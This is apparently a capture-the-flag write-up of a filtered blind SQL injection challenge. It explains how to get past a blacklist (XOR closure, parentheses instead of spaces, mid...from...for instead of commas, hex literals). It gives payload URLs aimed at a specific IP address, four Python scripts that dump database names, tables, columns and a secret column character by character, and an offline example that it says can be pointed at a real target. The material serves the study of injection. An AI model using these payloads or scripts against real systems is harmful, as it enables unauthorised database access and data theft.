A SQL injection challenge from 平安科技 (Ping An Technology)


Author: _阿烨_ | Published 2017-11-05 19:41

    Key points

    XOR closure with '^1^': the injection point is id='...', so the payload '^(cond)^' turns the clause into id=''^(cond)^''. An empty string is 0 in numeric context, and 0^0 = 0 while 0^1 = 1, so the clause collapses to id=1 when cond is true (the page prints Hello) and to id=0 when it is false. That difference is the boolean oracle the scripts below rely on.

    Spaces and %0b are filtered; parentheses take their place, and it is easy to lose track of them while writing the payloads.

    ord, ascii and substr are filtered, and neither spaces nor /**/ get them past the filter.
    mid is not filtered, so a character can be pulled out with mid and compared directly. The comparison runs under the default case-insensitive (_ci) collation, though, so upper and lower case both match and the case of the result cannot be recovered this way. (A BINARY cast would make the comparison case-sensitive; whether the filter lets that through was not tested here.)

    Commas are filtered:
    limit 0,1 becomes limit 1 offset 0, and
    substr(str,2,1) becomes the FROM ... FOR form, substr(str from 2 for 1); mid accepts the same syntax, which is what the payloads below use, since substr itself is blocked.

    But this challenge also taught a trick that does away with limit altogether:
    select group_concat(distinct(table_name)) returns every table name (or column name) in a single row, so there is nothing to page through.

    where(table_schema)in(0x776562) stands in for where table_schema='web' (0x776562 is 'web' in hex),

    and in general in(0x<hex>) stands in for ='a'.

    Every database, table and column name is written as a hex literal.

    Here are the four key payloads. mid positions are 1-based (from(0) returns the empty string and never matches), so the first character is at from(1):

    http://54.222.188.152:25718/index.php?id='^(mid(database()from(1)for(1))in(0x61))^'
    
    http://54.222.188.152:25718/index.php?id='^(mid((select(group_concat(distinct(table_name)))from(information_schema.tables)where(table_schema)in(0x776562))from(1)for(1))in(0x61))^'
    
    http://54.222.188.152:25718/index.php?id='^(mid((select(group_concat(distinct(column_name)))from(information_schema.columns)where(table_name)in(0x6d657373616765))from(1)for(1))in(0x61))^'
    
    http://54.222.188.152:25718/index.php?id='^(mid((select(group_concat(distinct(secret)))from(web.message))from(1)for(1))in(0x61))^'

    Each one asks whether the first character of the target string is 'a' (0x61); the scripts below sweep the position and the candidate character. In order they read the database name, the table names in database web (0x776562), the column names of table message (0x6d657373616765), and the secret column of web.message.
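
    To make the construction above concrete, here is an added example in Python 3. It is not the author's code and not the challenge's code: it builds the same mid()/in(0x..) payloads, checks each one against the blacklist the writeup lists, and runs the character-by-character extraction against a constructed stand-in oracle so that it runs offline. The blacklist matching (a case-insensitive substring test on the raw id value), the expression-to-value table and the values 'message,users' and 'Flag{Is_Case_Lost}' are assumptions made for the example. The stand-in oracle reproduces the two MySQL facts the writeup depends on: mid() with position 0 returns '' and the comparison is case-insensitive, which is why the last result comes back in lower case.

```python
import re

# Filter described in the writeup: space, %0b, comma, ord, ascii and substr are rejected.
# Assumption for this example: a plain case-insensitive substring match on the id value.
BLACKLIST = (" ", "%0b", ",", "ord", "ascii", "substr")

# Same candidate set as the extraction scripts (lower case only: the comparison is case-insensitive).
CHARSET = "abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\\}?!:@#$%&()[],. "

# The three expressions used in the writeup's payloads.
DB_EXPR = "database()"
TABLES_EXPR = ("select(group_concat(distinct(table_name)))from(information_schema.tables)"
               "where(table_schema)in(0x776562)")
SECRET_EXPR = "select(group_concat(distinct(secret)))from(web.message)"


def passes_filter(payload):
    """True if no blacklisted token appears anywhere in the payload."""
    low = payload.lower()
    return not any(tok in low for tok in BLACKLIST)


def hexlit(s):
    """MySQL hex literal for a string: 'web' -> '0x776562'. No quotes, no commas."""
    return "0x" + s.encode().hex()


def build_payload(expr, pos, ch):
    """Boolean-oracle payload: id=''^(mid((expr) from pos for 1) in (0xCH))^''.
    ''^x^'' is 0^x^0 = x, so the WHERE clause becomes id=1 exactly when the
    character at pos equals ch and id=0 otherwise."""
    return "'^(mid((%s)from(%d)for(1))in(%s))^'" % (expr, pos, hexlit(ch))


def extract(expr, oracle, charset=CHARSET, max_len=64):
    """Recover the string value of expr one character at a time via oracle(payload) -> bool."""
    out = ""
    for pos in range(1, max_len + 1):        # mid() positions are 1-based; from(0) yields ''
        for ch in charset:
            payload = build_payload(expr, pos, ch)
            if not passes_filter(payload):   # never send something the filter would eat
                raise ValueError("payload hits the filter: " + payload)
            if oracle(payload):
                out += ch
                break
        else:
            break                            # no candidate matched: end of the string
    return out


# --- constructed stand-in for the target so the loop runs offline -------------------
# The values are made up for this example; the keys are the writeup's expressions.
FAKE_DB = {
    DB_EXPR: "web",
    TABLES_EXPR: "message,users",
    SECRET_EXPR: "Flag{Is_Case_Lost}",
}

_PAYLOAD_RE = re.compile(
    r"^'\^\(mid\(\((.*)\)from\((\d+)\)for\(1\)\)in\((0x[0-9a-f]+)\)\)\^'$")


def fake_oracle(payload):
    """Answer as the page would: True iff the one-character comparison holds.
    Mirrors MySQL: mid() outside the string yields '' (which never equals a
    one-byte literal), and the _ci collation makes the comparison case-insensitive."""
    m = _PAYLOAD_RE.match(payload)
    if not m:
        return False
    expr, pos, hx = m.group(1), int(m.group(2)), m.group(3)
    value = FAKE_DB.get(expr, "")
    if pos < 1 or pos > len(value):
        return False
    return value[pos - 1].lower() == bytes.fromhex(hx[2:]).decode().lower()


if __name__ == "__main__":
    print(extract(DB_EXPR, fake_oracle))      # web
    print(extract(TABLES_EXPR, fake_oracle))  # message,users
    print(extract(SECRET_EXPR, fake_oracle))  # flag{is_case_lost}: case is lost by the _ci compare
```

    Pointing `extract` at a real target only means replacing `fake_oracle` with a function that sends `url + payload` and returns whether 'Hello' is in the response. The `for ... else` stops at the first position where no candidate matches, which is either the end of the string or a character outside CHARSET; the original scripts keep going and silently skip such a position, which shifts every later character.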
    

    database.py

    import requests
    url = "http://54.222.188.152:25718/index.php?id="
    # full set with upper case; pointless here because the comparison is case-insensitive
    #chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{\\}?!:@#$%&()[],. '
    chars = 'abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\\}?!:@#$%&()[],.'
    result = ''
    for i in range(1, 11):                 # mid() positions are 1-based; from(0) returns ''
        for j in chars:
            h = hex(ord(j))                # send the candidate as a hex literal, e.g. 'a' -> 0x61
            payload = "'^(mid(database()from(%d)for(1))in(%s))^'" % (i, h)
            # print(url + payload)
            r = requests.get(url + payload)
            # print(r.text)
            if 'Hello' in r.text:          # true branch: id=''^1^'' = 1 and the page prints Hello
                result += j
                print(result)
                break                      # this position is known, move to the next one
        else:
            break                          # nothing matched: end of the string
    

    table.py

    import requests
    url = "http://54.222.188.152:25718/index.php?id="
    #chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{\\}?!:@#$%&()[],. '
    chars = 'abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\\}?!:@#$%&()[],.'
    result = ''
    # group_concat returns all table names of database web (0x776562) in one row, so no limit is needed
    for i in range(1, 51):                 # mid() positions are 1-based; from(0) returns ''
        for j in chars:
            h = hex(ord(j))                # candidate as a hex literal, so the comma separator is sent as 0x2c
            payload = "'^(mid((select(group_concat(distinct(table_name)))from(information_schema.tables)where(table_schema)in(0x776562))from(%d)for(1))in(%s))^'" % (i, h)
            # print(url + payload)
            r = requests.get(url + payload)
            # print(r.text)
            if 'Hello' in r.text:
                result += j
                print(result)
                break
        else:
            break                          # nothing matched: end of the string
    

    column.py

    import requests
    url = "http://54.222.188.152:25718/index.php?id="
    #chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{\\}?!:@#$%&()[],. '
    chars = 'abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\\}?!:@#$%&()[],.'
    result = ''
    # column names of table message (0x6d657373616765), again all in one row via group_concat
    for i in range(1, 51):                 # mid() positions are 1-based; from(0) returns ''
        for j in chars:
            h = hex(ord(j))
            payload = "'^(mid((select(group_concat(distinct(column_name)))from(information_schema.columns)where(table_name)in(0x6d657373616765))from(%d)for(1))in(%s))^'" % (i, h)
            # print(url + payload)
            r = requests.get(url + payload)
            # print(r.text)
            if 'Hello' in r.text:
                result += j
                print(result)
                break
        else:
            break                          # nothing matched: end of the string
    

    dump.py

    import requests
    url = "http://54.222.188.152:25718/index.php?id="
    chars = 'abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\\}?!:@#$%&()[],. '  # reduced set; the space is kept
    #chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{\\}?!:@#$%&()[],. '
    # ord and ascii are filtered, so letters can only be compared with in(); that comparison is
    # case-insensitive, so upper and lower case both match and the dump comes back in lower case
    result = ''
    
    for i in range(1, 101):                # mid() positions are 1-based; from(0) returns ''
        for j in chars:
            h = hex(ord(j))
            payload = "'^(mid((select(group_concat(distinct(secret)))from(web.message))from(%d)for(1))in(%s))^'" % (i, h)
            # print(url + payload)
            r = requests.get(url + payload)
            # print(r.text)
            if 'Hello' in r.text:
                result += j
                print(result)
                break
        else:
            break                          # nothing matched: end of the string
    

Source: https://www.haomeiwen.com/subject/lccqmxtx.html